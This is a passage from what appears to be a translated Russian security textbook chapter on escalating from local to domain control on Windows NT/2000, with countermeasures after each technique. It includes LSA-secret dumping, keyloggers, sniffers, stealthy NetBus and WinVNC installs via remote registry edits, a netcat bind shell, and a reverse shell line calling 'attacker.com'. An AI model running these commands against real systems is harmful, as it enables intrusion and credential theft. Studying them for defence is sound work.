паролем), так и на гибком диске. Если вы чрезвычайно обеспокоены обеспечением безопасности, выберите второй вариант, но учтите при этом, что в большой сети это потребует дополнительных затрат на сохранение всех ключей на гибких дисках. Кроме того, как мы увидим несколько позже, существуют средства, позволяющие обойти и режим шифрования SYSKEY. Однако даже небольшой барьер, оказавшийся на пути взломщика, повышает безопасность сети. По крайней мере злоумышленнику придется хорошо потрудиться, чтобы взломать пароли. Группа исследователей RAZOR обнаружила изъян в реализации алгоритма шифрования SYSKEY, описание которого можно найти по адресу http://razor.-bindvi6w.com/publish/advisories/adv_WinNT_syskey.htinl. Если вы решили воспользоваться этим алгоритмом, то установите также модуль обновления, который можно получить по адресу http://wvw.microsoft.com/teohnet/ security/bulletin/ms99-056.asp. Если взломщики имеют безнадзорный физический доступ к компьютеру с системой NT/2000, то они без проблем могут загрузиться с использованием другой операционной системы и аннулировать пароль учетной записи администратора, удалив файл SAM, либо добавить пароль для любой имеющейся учетной записи. Этот прием позволяет полностью обойти алгоритм шифрования SYSKEY. Лишь при использовании режима защиты с использованием пароля или при хранении системного ключа на гибком диске можно несколько повысить уровень защиты. Более подробная информация по этому вопросу содержится в разделе главы 6, который посвящен утилите chntpw.
Аудит доступа к базе данных SAM Зачастую бывает довольно трудно выявить факт извлечения информации о паролях с вашего узла NT. Одной из возможностей, призванных помочь в решении этой проблемы, является аудит системы NT, обеспечивающий наблюдение за доступом к параметрам реестра, связанных с SAM. Однако на практике это средство мало что может сделать, поскольку к этим параметрам имеют доступ очень многие служебные процессы (например, диспетчер пользователей). Но несмотря на то, что само по себе решение не очень хорошее, некоторые технические аспекты настройки контроля доступа к SAM заслуживают внимания. |
Использование доверительных отношений Для того чтобы "получить в свое распоряжение" домен, недостаточно обладать правами администратора на одном из компьютеров сети. Фактически в больших сетях многие серверы NT являются независимыми серверами приложений (т.е. компьютерами, которые используются конечными пользователями, но работающие под управлением операционной системы Windows NT Server, а не NT Workstation), а не контроллерами доменов, на которых хранятся копии базы данных SAM домена. Однако в распоряжении взломщика имеется несколько способов получения информации от автономного сервера, на основании которой можно получить доступ ко всему домену. Дублирование данных учетных записей администраторов домена и локальной системы Самым простым методом проникновения является использование довольно распространенной порочной практики администрирования, заключающейся в хранении данных о пользователях домена на отдельных компьютерах, работающих под управлением NT Server или Workstation. В идеальной ситуации никто не должен обладать правом регистрации на рабочей станции NT как Local Administrator с тем же паролем, что и Domain Admin. To же самое относится и к созданию локальной учетной записи с теми же пользовательским именем и паролем, которые используются в учетной записи на уровне домена. Однако в реальности такая практика является, скорее, правилом, а не исключением. Подобный один-единственный изъян в системе защиты может привести к созданию "лазеек" для проникновения в домен NT, с чем нам не раз приходилось сталкиваться при тестировании различных сетей.
Контрмеры против дублирования данных учетных записей Самой лучшей защитой от таких "подводных камней" является использование сложных паролей для всех учетных записей группы администраторов домена и их последующее регулярное изменение (не реже, чем один раз в месяц). Кроме того, пользовательские учетные записи не должны использоваться для выполнения административных функций. Если в этом есть необходимость, создайте для таких пользователей специальные учетные записи и установите режим их аудита. Например, вместо того чтобы вносить учетную запись jsmith в группу Domain Admins, создайте учетную запись jsmitha с соответствующим уровнем привилегий. (Обратите внимание, что не стоит создавать учетные записи вида isadmin, поскольку они сразу же привлекут внимание взломщика.) Встроенная команда runae Windows 2000 предоставляет более простой способ запуска приложений с необходимыми привилегиями. Например, следующая команда runas запускает сеанс командной оболочки, работающий в контексте учетной записи Administrator домена DOMAIN2. runas /user:domain2\administrator cmd.exe Атака на секреты LSA Эта атака может послужить одним из самых ярких примеров той опасности, к которой может привести хранение регистрационных данных в незашифрованном виде. Такая информация вместе с некоторыми другими важными данными хранится системой NT во многих местах. Процесс получения конфиденциальной информации носит название атаки на секреты подсистемы защиты LSA (Local Security Authority). Эту информация определяется параметром системного реестра HKEY_LOCAL_MACHINE\-SECURITY\Policy\Secrets. К секретам LSA относятся следующие данные.
Очевидно, что такие сведения, как пароли учетных записей служб, запушенных с привилегиями пользователей домена, информация о последних регистрировавшихся пользователях, пароли доступа рабочих станций к домену и так далее могут оказать взломщику существенную помощь в исследовании структуры домена. D:\Toolbox>lsadump2 $MACHINE.ACC Как видно из приведенного фрагмента, в полученных данных содержится пароль учетной записи домена, а также два пароля, связанных с учетными записями службы SQL, которые извлечены из данных LSA. Контрмеры: защита секретовLSA К сожалению, компания Microsoft не сказала ничего оригинального, заявляя, что к подобной информации администратор имеет доступ в соответствии с принятой архитектурой. В статье базы знаний KB Q184017 описывается модуль обновления, предназначенный для исправления изъянов исходной версии подсистемы LSA. После его установки с помощью шифрования SYSKEY кодируются хранящиеся на компьютере пароли учетных записей служб, кэшируемые данные для регистрации в домене, а также пароли рабочей станции. Параметры реестра, предназначенные для автоматической регистрации Систему NT можно настроить таким образом, чтобы при загрузке выполнялась автоматическая регистрация в системе. Для этого используется параметр системного реестра HKLM\SOFWTARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon. Автоматическая регистрация может оказаться полезной в тех редких случаях, когда неже- Контрмеры против автоматической регистрации Для того чтобы запретить автоматическую регистрацию, удалите значение параметра DefaultPassword. Кроме того, нужно удалить значение параметра AutoAdmin Logon или установить его равным 0. Регистраторы нажатия клавиш Если все остальные попытки взломщика, имеющего статус администратора локальной системы, получить аналогичные привилегии в домене не увенчались успехом, он может попытаться пойти самым простым путем: установить регистратор нажатия клавиш (keystroke logger). Так называются программы, которые скрытно от пользователя перехватывают все нажатия клавиш и, прежде чем передать их операционной системе, записывают в скрытый файл на диске. Рано или поздно какой-нибудь пользователь, зарегистрировавшись в системе, оставит соответствующий "отпечаток" своего имени и пароля в файле программы-регистратора. За несколько недель работы утилита IKS, как правило, перехватывает хотя бы одну пару "имя пользователя/пароль" уровня домена, которые обычно находятся после записи, сгенерированной при нажатии <Ctrl+Alt+Del>. Контрмеры: защита от программ-регистраторов Обнаружить программы-регистраторы не так-то просто. Это объясняется тем, что они внедряются в систему на низком уровне. Что касается IKS, мы рекомендуем поискать в системном реестре параметр LogName, который должен находиться где-то в группе параметров HKLM\SYSTEM\CurrentControlSet\Services. Значением этого параметра является путь к журналу регистрации нажимаемых клавиш. Параметр, в котором находится данное значение, можно безболезненно удалить (естественно, соблюдая обычные предосторожности, связанные с редактированием системного реестра). Для обнаружения же самого драйвера IKS требуется обладать в какой-то степени навыками сыщика, чтобы распознать его среди прочих файлов . sys, хранящихся в каталоге %systemroot%\system32\drivers. Самым простым методом является проверка свойств каждого файла. Во вкладке Version диалогового окна свойств IKS будет указано IKS NT4 Device Driver, а в качестве внутреннего имени — iksnt. sys. |
Анализаторы сетевых пакетов Перехват пакетов, передаваемых в локальной сети, является одним из наиболее эффективных способов дальнейшего проникновения в сеть после того, как взломщик получил доступ к одному узлу. В настоящее время имеется множество средств перехвата пакетов, в том числе один из самых знаменитых коммерческих наборов анализа протоколов Sniffer Pro от компании Network Associate (http://www.nai.com). Этот комплект средств появился сразу же за выпуском прекрасной свободно распространяемой программы CaptureNet 3.12, являющейся частью набора SpeNet/PeepNet от Лаврентия Никулы (Laurentiu Nicula), который можно найти по адресу http://packetstorm.securify.com. Достаточно много можно сказать и о приложении Network Monitor, входящем в комплект поставки системы NT/2000. Эта утилита позволяет отслеживать трафик лишь локального узла. Однако при установке сервера SMS (Systems Management Server) можно воспользоваться полной версией Network Monitor. BUTTSniffer Среди взломщиков системы NT наиболее популярным средством является динамически загружаемая программа BUTTSniffer от Дилдога (DilDog), основного автора Back Orifice 2000. Программа BUTTSniffer состоит из двух основных компонентов, BUTTSniff.exe (139,264 байт) и BUTTSniff.dll (143,360 байт), каждый из которых можно переименовать. Для установки этих файлов достаточно просто загрузить их на целевой узел. Никаких дополнительных действий по установке не требуется. Запуск программы осуществляется из командной строки, в которой можно указать различные параметры. Параметр -1 позволяет получить список интерфейсов, доступных для перехвата пакетов. Взломщики наверняка воспользуются возможностью копирования всех захваченных данных в файл на жестком диске (для этого нужно не использовать параметры фильтрации), как показано в следующем примере. D:\Toolbox\buttsniffer>buttsniff-1 Утилита BUTTSniffer отличается нестабильностью. При ее использовании в течение продолжительного времени она может привести к краху системы NT (появлению синего экрана смерти).
fsniff Утилита fsniff написана компанией Foundstone, Inc., в которой авторы книги являются ведущими сотрудниками. Утилитой fsniff используется динамически загружаемый драйвер захвата пакетов (fsniff .sys), что значительно облегчает ее использование. Эта утилита выполняет автоматическую фильтрацию данных аутентификации, содержащихся в пакетах, как показано в следующем примере сеанса FTP. С:\tmp>fsniff
Анализаторы пакетов Win32 * на базе интерфейса WinPcap Многие популярные программы-анализаторы UNIX, предназначенные для захвата пакетов на уровне пользователей, созданы на базе интерфейса libpcap, не зависящего от используемой платформы. Свободно распространяемая версия Win32 этого интерфейса, WinPcap, была разработана группой исследователей из политехнического университета Торино (Politecnico di Torino) (http://netgroup-serv.polito.it/winpcap). Этот интерфейс предоставляет основу для создания некоторых интересных средств перехвата сетевых пакетов. Однако их неудобно устанавливать на удаленном узле и использовать из командной строки. Кроме того, в отличие от динамически загружаемых утилит BUTTSniffer и f sniff, для активизации таких средств зачастую требуется перезагрузка. В последующих разделах для полноты излагаемого материала, а также для облегчения дальнейших исследований в этой области, будут рассмотрены некоторые из средств, созданных на базе интерфейса WinPcap. WinDump Эта утилита, являющаяся аналогом утилиты tcpdump системы UNIX, написана авторами WinPcap. Как видно из приведенного ниже примера, эта утилита является простым средством перехвата пакетов, предоставляющим данные в необработанном виде. D:\>windump dsniff для Win32 Утилита dsniff является одним из самых лучших средств перехвата пакетов системы UNIX, предназначенных исключительно для получения паролей. Она была написана Дагом Сонгом (Dug Song) (http://naughty.monkey.org/~dugsong/dsniff/). Утилита dsniff автоматически выявляет и подробно анализирует каждый протокол, сохраняя лишь часть уникальных данных, используемых при аутентификации. D:\dsniff>dsniff
Контрмеры: защита от перехвата пакетов Если приведенные выше советы показались вам недостаточными, дополнительно можно порекомендовать следующее. При передаче информации по сети используйте механизмы шифрования, такие как сервер SSH (Secure Shell), протокол SSL (Secure Sockets Layer), шифрование почтовых сообщений POP (Pretty Good Privacy) или шифрование на уровне IP, которое обеспечивается при реализации виртуальных частных сетей на-базе протокола IPSec (см. главу 9). Это надежные средства защиты от атак, направленных на перехват пакетов. Использование сетей с коммутируемой архитектурой и виртуальных локальных сетей (Virtual Local Area Network) может значительно снизить риск взлома, однако в случае применения таких средств, как утилиты dsnif f и arpredirect из UNIX (см. главу 10), нельзя предоставить никаких гарантий. При печати второго издания этой книги был выпущен совместимый с системой NT/2000 сервер SSH, который можно найти по адресу http://marvin.criadvantage.com/caspian/Software/SSHD-NT/default.php. Многие годы он служил основой безопасного удаленного управления системами на базе UNIX, и очень интересно познакомиться с новой версией, которая позволяет из командной строки удаленно управлять системами NT/2000. Ее можно рассматривать как альтернативу терминального сервера. Более подробную информацию о сервере SSH можно найти по адресу http://www.employees.org/-satch/ssh/faq/ssh-faq.html. |
Удаленное управление и потайные ходы Мы не раз отмечали, что в системе NT недостаточно хорошо обстоят дела с удаленным выполнением команд, однако до этого момента картина освещалась несколько однобоко. Дело в том, что после получения статуса администратора у взломщика появляется целый ряд возможностей выполнения таких операций. Утилита remote.exe (NTRK)
В состав NTRK входят две утилиты, обеспечивающие удаленное выполнение команд: Remote Command Line (remote.exe) и Remote Command Service (rcmd.exe и rcmdsvc.exe, клиент и сервер соответственно). Эти утилиты включены лишь в серверный вариант NTRK. С:\> ас \\192.168.202.44 start schedule Для запуска команд в течение нескольких секунд можно использовать утилиту soon из набора NTRK. Теперь можно воспользоваться командой AT и запустить экземпляр remote. exe в серверном варианте, запланировав запуск через две минуты от текущего времени взламываемого компьютера (для использования в команде пробелов ее необходимо заключить в двойные кавычки). С помощью второй команды, как показано ниже, можно убедиться, что задание было запланировано корректно (для исправления ошибок воспользуйтесь первой командой AT с параметром [номер задания] /delete). С:\> at \\192.168.202.44 10:40Р ""remote /s cmd Когда наступает момент выполнения запланированной команды, соответствующий номер задания исчезает из листинга, выводимого командой AT. Если команда была введена корректно, это означает, что сервер remote заработал. Теперь взломщик имеет доступ к командной строке удаленной системы с помощью клиентского режима команды remote. Во избежание путаницы мы используем в примере для локальной системы приглашение D:>, а для удаленной — С:>. В данном примере используется команда DIR для просмотра каталога удаленной системы, а затем с помощью команды @Q завершается работа клиента, а сервер продолжает работать (команда @к завершает работу сервера). D:\> remote /с 192.168.202.44 secret Да, пожалуй, вряд ли ребята из Microsoft могли придумать что-то еше более простое для хакера средней руки! Теперь мы можем запускать файлы на удаленной системе, хотя только из командной строки. Еше одним ограничением утилиты remote.exe является то, что программы, использующие консольный программный интерфейс Win32, также работать не будут. Однако в любом случае это лучше, чем вообще отсутствие возможности удаленного запуска. Как мы вскоре увидим, с ее помощью на удаленной системе можно установить более мощные средства управления. Удаленный доступ к командной оболочке с помощью netcat
Еще одним простым способом организации "потайного хода" является применение "армейского швейцарского ножа TCP/IP"— утилиты netcat (http://www.ldpht. com/netcat). Утилиту netcat можно настроить на прослушивание определенного порта с последующим запуском исполняемой программы, если удаленная система подключается к данному порту. Настроив утилиту netcat на запуск интерпретатора командной строки NT, можно сделать так, чтобы этот интерпретатор запустился на удаленной системе. Синтаксис для запуска команды netcat в режиме скрытого прослушивания приведен в следующем примере. Параметр -L позволяет восстанавливать разорванное соединение; -d активизирует режим скрытого прослушивания (т.е. без обмена информацией с консолью); -е позволяет задать запускаемую программу (в данном случае — интерпретатор командой строки NT cmd. exe); а -р указывает порт, который будет прослушиваться. С:\TEMP\NC1lNT>nc -L -d -e and.exe -p 8080 D:\> nc 192.168.202.44 8080 Таким образом, теперь удаленный пользователь может выполнять команды и запускать программы. Теперь судьба удаленного компьютера целиком и полностью зависит лишь от фантазии взломщика. NetBus
Невозможно, рассказывая о безопасности NT, умолчать о NetBus — "старшей сестре" широко известной утилиты Back Orifice (ВО) для Win 9x, разработанной группой хакеров "Культ мертвой коровы" (cDc — Cult of the Dead Cow). Она предназначена для удаленного управления и хакинга. Главное различие между NetBus и ВО состоит в том, что первая работает как на платформе Windows NT, так и в Win 9x (правда, последние версии ВО также работают в NT — подробнее см. в следующем разделе "Back Orifice 2000"). Первая версия утилиты, разработанной Карлом-Фриде-риком Нейктером (Carl-Fredrik Neikter), распространялась бесплатно, но в начале 1999 года появившаяся версия 2.0 вышла уже в варианте NetBus Pro, который распространяется узлом http://www.netbus.org по цене $15. В новой версии были устранены многие проблемы NetBus, такие как необходимость физического доступа для ее использования в режиме скрытой работы, а также несовместимость с некоторыми средствами доставки "троянских коней". Однако "взломанные" версии утилиты, имеющиеся на хакерских узлах в Internet, не поддерживают данных возможностей. Таким образом, в Internet можно найти лишь недостаточно надежные версии NetBus (последняя версия, выпущенная перед выходом NetBus Pro, имела номер 1.7). Учитывая, сколько новых возможностей реализовано в профессиональной версии, мы не будем тратить время на описание методов использования предыдущих версий. D:\temp>regini -m \\192.168.202.44 netbus.txt Данные параметры управляют основными функциями утилиты NetBus. Самыми важными из них являются следующие: General\TCPPort, который настраивает сервер NBSVR на прослушивание порта 80 (это лишь рекомендация, так как порт HTTP, скорее всего, не будет отфильтровываться маршрутизатором); visibility =3, значение, задающее режим скрытой работы; AutoStart = 1, включающее режим автоматического запуска серверной части NBSVR при загрузке Windows (при этом автоматически создается дополнительный параметр реестра в группе HKLM\SOFTWARE\ Microsoft\Windows\CurrentVersion\RunServices, содержащий значение с типом REG_SZ вида С:\WINNT\SYSTEM32\NBSvr.EXE). Большинство остальных команд включено в программу, скорее для "невинных шалостей", а не для извлечения какой-то пользы (открытие и закрытие дисковода компакт-дисков, блокировка клавиатуры и т.д.). Одним из немногих действительно полезных средств является регистратор нажатия клавиш, диалоговое окно которого показано ниже. Кроме того, с помощью такой полезной функции, как перенаправление портов, можно использовать взломанный компьютер как плацдарм для проникновения на другие узлы сети.
Контрмеры против использования NetBus
Показанные выше изменения в системном реестре очень просто обнаружить и удалить, однако более старые версии NetBus размещали файл изменений реестра и файл сервера в разных местах и под разными именами (ранее выполняемый файл серверной части NetBus по умолчанию назывался patch.exe и часто переименовывался в [space] .exe). Кроме того, различные версии NetBus прослушивают разные порты (чаше всего по умолчанию используются порты 12345 и 20034). Наконец, все установленные по умолчанию конфигурационные параметры легко модифицировать в соответствии с желаниями взломщика. Поэтому самый лучший совет, который мы можем дать, состоит в том, чтобы найти хорошую утилиту, позволяющую удалить NetBus. Современные антивирусные пакеты легко справляются с этой задачей, поэтому нужно их регулярно использовать. Однако сначала убедитесь, что антивирусный пакет в процессе проверки не ограничивается поиском имен стандартных файлов NetBus и параметров системного реестра. Кроме того, мы считаем, что нужно также регулярно проверять параметры, управляющие запуском программ при загрузке Windows (см. раздел "Параметры Реестра, Обеспечивающие Выполнение Программ" выше в данной главе), поскольку избавиться от вредоносной программы, которая всякий раз запускается вместе с Windows, невозможно. Back Orifice 2000
Хотя первая версия Back Orifice не работала в системе NT, всего за год ее программисты из группы хакеров "Культ мертвой коровы" (Cult of the Dead Cow) справились с задачей переноса своего детища на эту платформу. Версия Back Orifice 2000 (ВО2К) появилась 10 июля 1999 года, чем изрядно подпортила настроение администраторам NT, которые посмеивались над ВО9х По предоставляемым функциям ВО2К практически не отличается от ВО9х в том, что касается удаленного управления. Мы уже подробно рассматривали соответствующие функции в главе 4, поэтому не будем повторять их здесь еще раз, а сосредоточимся лишь на том, как распознать и удалить ВО2К, установленную в вашей сети. Контрмеры: защита от Back Orifice 2000
Как и в случае с NetBus, большинство ведущих разработчиков антивирусного программного обеспечения обновили свои программные продукты, так что теперь с их помощью можно распознать и удалить ВО2К. Поэтому самый простой способ обезопасить себя от ВО2К — регулярно обновлять антивирусный пакет. Существуют также и специальные средства обнаружения и удаления ВО, однако к ним нужно относиться с осторожностью. Некоторые из них не удаляют ВО2К, а устанавливают, играя роль "троянских коней". Одним из продуктов, которым можно доверять, является Internet Scanner компании Internet Security Systems (ISS). С его помощью можно выявить присутствие ВО2К в сети, проверяя все находящиеся в режиме ожидания запросов порты. Удаленная атака на GUI системы NT с помощью WinVNC
Удаленное управление с помощью утилит командной строки — это хорошо, но все же NT является операционной системой с мощным графическим интерфейсом. Программа NetBus предоставляет возможность удаленного управления с помощью графического интерфейса, но версия, имеющаяся в нашем распоряжении во время написания книги, работает слишком медленно и к тому же нестабильно. Тем не менее, существует прекрасное средство, свободное от всех этих недостатков, — пакет Virtual Networking Computing (VNC), созданный кембриджской лабораторией AT&T и распространяемый через https://www.comparitech.com/vpn/what-is-a-vnc-and-how-does-it-differ-from-a-vpn/ (более подробное обсуждение VNC приведено в главе 13). Одна из причин, по которой VNC выгодно отличается от прочих программ аналогичного назначения (помимо столь примечательного факта, что VNC абсолютно бесплатна!), заключается в том, что ее установка через удаленное сетевое соединение выполняется не намного сложнее, чем локальная установка. Используя удаленный сеанс командной строки, который был рассмотрен выше, достаточно лишь установить на удаленный компьютер службу VNC и обеспечить ее скрытый запуск, внеся одно-единственное изменение в системный реестр. Ниже приведено краткое описание этой процедуры, но для того, чтобы лучше разобраться в методах управления VNC из командной строки, мы все же рекомендуем изучить полную документацию по VNC, которую также можно найти по указанному выше адресу URL. HKEY_USERSX.DEFAULTXSoftware\ORL\WinVNC3 Затем с помощью утилиты regini эти параметры необходимо поместить в системный реестр удаленного компьютера. С:\> regini -m \\192.168.202.33 winvnc.ini Наконец установите программу WinVNC в качестве службы и запустите ее. В следующем примере показано, как это сделать с помощью удаленного сеанса командной строки. С:\> winvnc -install С:\> net start winvnc Теперь можно запустить приложение vncviewer и подключиться к удаленному компьютеру. Ниже показаны два диалоговых окна, в первом из которых приложение vnc viewer уведомляет пользователя о том, что установлен сеанс связи с "дисплеем О", имеющим IP-адрес 192.168.202.33. (Синтаксис узел-дисплей эквивалентен принятому в системе оконного интерфейса X Window системы UNIX. Все системы, работающие под управлением Windows, по умолчанию обозначаются как дисплей 0.) Второе диалоговое окно предназначено для ввода пароля (вы еще не забыли, какое слово мы выбрали в качестве пароля?). Вуаля! Перед вами во всей своей красе появляется изображение рабочего стола удаленного компьютера, как показано на рис. 5.9. При этом указатель мыши ведет себя так, словно вы держите в руках не свою мышь, а мышь удаленного компьютера. Остановка и удаление WinVNC
Самый простой способ остановки службы WinVNC и ее удаления состоит в использовании двух следующих команд. net stop winvnc Для удаления оставшихся в реестре параметров воспользуйтесь утилитой из набора NTRK REG.EXE, как показано в следующем примере. C:\>reg delete \\192.168.202.33
|
Перенаправление портов Выше было рассмотрено несколько программ, которые можно использовать для удаленного управления из командной строки. Все эти средства обсуждались в контексте установки непосредственного удаленного соединения. Однако, что делать в той ситуации, когда брандмауэр блокирует прямой доступ к целевому компьютеру? Подобную преграду взломщики могут обойти с помощью перенаправления портов (port redirection). Этот вопрос подробно будет изложен в главе 14, однако сейчас мы познакомимся с некоторыми средствами и приемами, которые могут оказаться полезными для хакинга компьютеров под управлением системы NT. Захват командной оболочки м помощью netcat Если имеется возможность поместить утилиту netcat на целевой компьютер, расположенный позади брандмауэра, то через любой требуемый порт можно получить "в свое распоряжение" удаленную командную оболочку. Такую ситуацию мы называем "захватом оболочки", поскольку в этом случае на рабочем компьютере взломщика сосредоточиваются все функции оболочки удаленной системы. Вот пример команды, запущенной взломщиком из удаленной командной строки. nс attacker.com 80 | cmd.exe | nс attacker.com 25
Утилита rinetd Реализация перенаправления портов с помощью трех настроенных вручную сеансов netcat может оказаться далеко не наилучшим способом. Для этого можно воспользоваться различными утилитами, специально предназначенными для перенаправления портов. Эти средства можно найти в Internet. Одной из наиболее мощных утилит является rinetd — сервер перенаправления Internet Томаса Боутела (Thomas Boutell), который можно найти по адресу http://www.boutell.com/rinetd/index.html. С ее помощью можно перенаправить TCP-соединения с одного IP-адреса и порта на другой. Утилита rinetd функционирует подобно datapipe (см. главу 14). Существует также версия, поддерживающая интерфейс Win32 (включая 2000), а также Linux. Утилиту rinetd очень легко использовать: достаточно просто создать конфигурационный файл, содержащий правила передачи пакетов, в следующем формате. Утилита fpipe Утилита fpipe — средство передачи/перенаправления исходных пакетов TCP через заданный порт. Она разработана в компании Foundstone, Inc., к которой авторы этой книги имеют непосредственное отношение. Утилита fpipe позволяет создать поток TCP и дополнительно задать требуемый исходный порт. Ее удобно применять для тестового проникновения через брандмауэры, разрешающие прохождение определенных типов пакетов во внутреннюю сеть.
Самой примечательной особенностью утилиты fpipe является возможность задать исходный порт. В процессе тестового проникновения это зачастую необходимо для обхода брандмауэра или маршрутизатора, передающего лишь данные, предназначенные определенным портам (например, порту TCP 25, используемому почтовым сервером). Обычно клиентским соединениям TCP/IP назначаются исходные порты с большими номерами, которые брандмауэр, как правило, пропускает через фильтр. Однако тот же брандмауэр должен пропускать данные DNS (фактически, он это и делает). С помощью утилиты fpipe для потока данных можно принудительно задать определенный исходный порт, в данном случае порт DNS. С этого момента этот поток будет рассматриваться брандмауэром как данные "разрешенной" службы и, таким образом, будет пропускаться во внутреннюю сеть. Пользователи должны знать, что если при задании порта-источника исходящего соединения был использован параметр -в и это соединение было закрыто, может оказаться невозможным установить его повторно (утилита fpipe сообщит, что адрес уже используется) до того момента, пока не истекут интервалы ожидания TIMEJHAIT и CLOSEJHAIT, определяемые протоколом TCP. Эти интервалы ожидания могут варьироваться в диапазоне от 30 секунд до четырех минут и более, в зависимости от используемой операционной системы и ее версии. Эти интервалы ожидания определяются протоколом TCP и не являются ограничением самой утилиты fpipe. Причина возникновения такой ситуации заключается в том, что утилита fpipe пытается установить новое соединение с удаленным узлом с применением тех же комбинаций локальных/удаленных адреса/порта IP, что и в предыдущем сеансе. Новое же соединение не может быть установлено до тех пор, пока стеком протоколов TCP не будет решено, что предыдущее соединение не было полностью завершено. |
Основные контрмеры против атак, направленных на расширение привилегий Как же избавиться от всех программ, установленных в ходе изучения вами данной главы, и "залатать" все оставшиеся "дыры" в защите? Поскольку многие из них были созданы с доступом на уровне администратора, что позволяет использовать все аспекты архитектуры NT, а большинство нужных нам файлов могли быть переименованы и (или) настроены десятками различных способов, эта задача довольно нетривиальна. Мы предлагаем следующие решения общего характера, затрагивающие четыре основные области, к которым так или иначе относятся описываемые в данной главе вопросы: имена файлов, параметры системного реестра, процессы и порты. Для ознакомления с некоторыми дополнительными контрмерами против описанных атак мы настоятельно рекомендуем прочитать о "потайных ходах" в главе 14. Если взломщику удалось получить привилегии администратора, то лучшим выходом из ситуации является полная переустановка системного программного обеспечения с использованием проверенных носителей. Искушенный взломщик может настолько хорошо скрыть определенные "потайные ходы", что их не удастся обнаружить даже опытным исследователям. Этот совет дан в основном для создания полноты картины. Его не рекомендуется применять при организации подобных атак.
Имена файлов Контрмеры, построенные на использовании имен файлов, по всей видимости, наименее эффективны, поскольку любой мало-мальски соображающий взломщик либо переименует файлы, либо предпримет другие меры, чтобы скрыть их (см. ниже раздел "Сокрытие следов"). Тем не менее, обезопасив себя в этом отношении, вы сможете еще на "дальних подступах" обнаружить хотя бы наименее изобретательных взломщиков. Параметры системного реестра В отличие от утомительного поиска файлов с определенными именами в надежде, что они не были изменены, поиск параметров системного реестра может оказаться особенно эффективным, поскольку большинство из рассмотренных программ помешает строго определенные параметры в строго определенные места системного реестра. Хорошим местом для начала поиска являются группы параметров HKLM\SOFTWARE и HKEY_USERS\ .DEFAULT\Software, в которых большинство устанавливаемых приложений помещают свои параметры. В частности, утилиты NetBus Pro и WinVNC сохраняют свои параметры следующим образом.
С помощью утилиты командной строки REG.EXE, входящей в состав NTRK, удалить данные параметры из реестра довольно просто, в том числе и на удаленных компьютерах. При этом используется следующий синтаксис. Параметры системного реестра, управляющие запуском программ в процессе загрузки Основываясь на своем опыте, можем отметить, что практически все взломщики помещают параметры своих программ в стандартную группу параметров системного реестра, управляющих запуском приложений при загрузке Windows. Поэтому на предмет наличия вредоносных или подозрительных параметров нужно регулярно проверять соответствующие области системного реестра, перечисленные ниже.
Кроме того, необходимо как можно жестче ограничить доступ пользователей к этим группам параметров. По умолчанию группа EVERYONE имеет разрешения Set value к группе параметров HKLM\ . . \. . \Run. Для того чтобы отменить эти привилегии, воспользуйтесь командой Security>Permissions в редакторе системного реестра regedt32. В данном случае взломщик в любой момент может скрытно подключиться к системе, по крайней мере до тех пор, пока администратор, взявшись за ум, не проверит системный реестр и не удалит из него соответствующий параметр. Процессы Для обнаружения тех хакерских инструментов, которые нельзя переименовать или скрыть каким-либо другим способом, можно проанализировать список выполняющихся на компьютере процессов. Например, с помощью команды AT можно запланировать задание, которое просматривает список процессов и удаляет из него такие обнаруженные процессы, как remote.exe или пс.ехе. Поскольку для использования сервера remote в системном администрировании нет особых причин (особенно, если учесть, что эта утилита не выполняет аутентификации), то для периодического удаления ее из списка процессов можно использовать команду kill.exe из набора NTRK. В следующем примере показано, как с помощью команды AT запланировать задание, которое будет выполняться каждый день в шесть часов утра и удалять процесс remote. Это немного грубо, но зато эффективно — вам остается лишь настроить время запуска в соответствии со своими предпочтениями. C:\>at 6А /е:1 Для этих же целей можно использовать утилиту rkill.exe из набора NTRK. Она отличается от kill. exe тем, что может выполняться на удаленном компьютере, а также тем, что в отличие от утилиты kill.exe, нуждается в предоставлении ей в качестве параметра идентификатора удаляемого процесса (PID — Process ID). PID процесса удаленного компьютера можно получить с помощью утилиты pulist.exe, которая также входит в состав NTRK. Можно создать целую автоматизированную систему, в которой регулярно запускается утилита pulist и собирает информацию о выполняющихся на узлах сети запрещенных процессах с последующей передачей этой информации rkill. Конечно, еще раз нужно оговориться, что такую систему очень легко обойти, присвоив выполняемому файлу remote.exe какое-нибудь другое, не вызывающее подозрений имя, например WINLOG.EXE. Однако она сможет эффективно противостоять процессам, которые нельзя переименовывать, например winVNC. EXE. Порты Даже если такие утилиты, как remote или пс, были переименованы, утилита netstat поможет выявить их присутствие по наличию портов, находящихся в состоянии ожидания или соединения. Периодический запуск netstat с целью проверки подобных соединений — это иногда наилучший способ найти их. В следующем примере показано, как утилита netstat, запущенная на целевом сервере в то время, когда взломщик подключился к нему с помощью утилит remote, nc и установил соединение с портом 8080, отображает результаты опроса портов (описание параметра -an можно узнать, введя в командной строке команду netstat /?). Обратите внимание, что в соединении remote используется порт TCP 139, а утилита netcat находится в состоянии ожидания и имеет одно установленное соединение с портом TCP 8080 (остальные данные, отображаемые netstat, удалены для наглядности). С:\> netstat -an Из приведенного фрагмента листинга команды netstat видно, что наилучшей защитой против использования утилиты remote является блокирование доступа к портам 135-139 потенциальных целей или на уровне брандмауэра либо отключение привязки NetBIOS для незащищенных адаптеров, как описывалось в разделе "Контрмеры: Защита От Подбора Пароля" выше в данной главе. FPORT - Process port mapper |
Набор Rootkit — полный взлом системы А что, если даже сам код операционной системы окажется под контролем взломщика? Эта идея достаточно хорошо опробована для платформы UNIX. Закономерно, что для замены стандартных исполняемых файлов "троянскими конями" обычно требуется получить учетную запись root системы UNIX на целевом компьютере. Наборы программ, выполняющих эту операцию, получили название "отмычек". "Отмычки", применяемые в UNIX, подробно рассматриваются в главе 8, а обсуждение "отмычек" вообще можно найти в главе 14. Отмычки" NT/2000 Нет ничего удивительного в том, что в 1999 году благодаря группе Грега Хогланда (Greg Hogland, http://www.rootkit.com) система Windows NT/2000 "приобрела" свой собственный набор "отмычек". Грег застал врасплох сообщество Windows, продемонстрировав рабочий прототип таких инструментов, который способен выполнять сокрытие параметров системного реестра и "подмену" исполняемых файлов. Этот набор можно использовать в исполняемых файлах "троянских коней" без изменения их содержимого. Все эти трюки основываются на использовании перехвата функций (function hooking). Таким образом можно "модифицировать" ядро NT, в результате чего будут захвачены системные вызовы. С помощью набора "отмычек" можно скрыть процесс, параметр системного реестра или файл, а также перенаправить перехваченный вызов функциям "троянских коней". Полученный результат способен превзойти ожидания от внедрения "троянских коней": пользователь не может быть уверен даже в целостности исполняемого кода. Контрмеры: защита от набора "отмычек" Если вы не можете доверять даже команде dir, значит, пришло время 